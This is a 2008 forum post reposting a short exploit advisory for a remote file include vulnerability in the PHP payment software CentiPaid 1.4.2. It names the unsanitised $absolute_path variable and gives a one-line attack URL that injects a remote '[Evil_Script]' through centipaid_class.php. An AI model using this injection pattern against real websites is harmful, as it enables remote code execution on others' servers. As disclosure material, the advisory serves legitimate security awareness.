Guest Nemessis Posted April 26, 2008 Report Share Posted April 26, 2008 http://www.milw0rm.com/exploits/2555---------------------------------------------------------------------------CentiPaid <= 1.4.2 [absolute_path] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : CentiPaidversion : 1.4.2URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.2.tar.gz------------------------------------------------------------------Exploit:~~~~~~~~Variable $absolute_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/centipaid_class.php?absolute_path=[Evil_Script] Quote Link to comment Share on other sites More sharing options...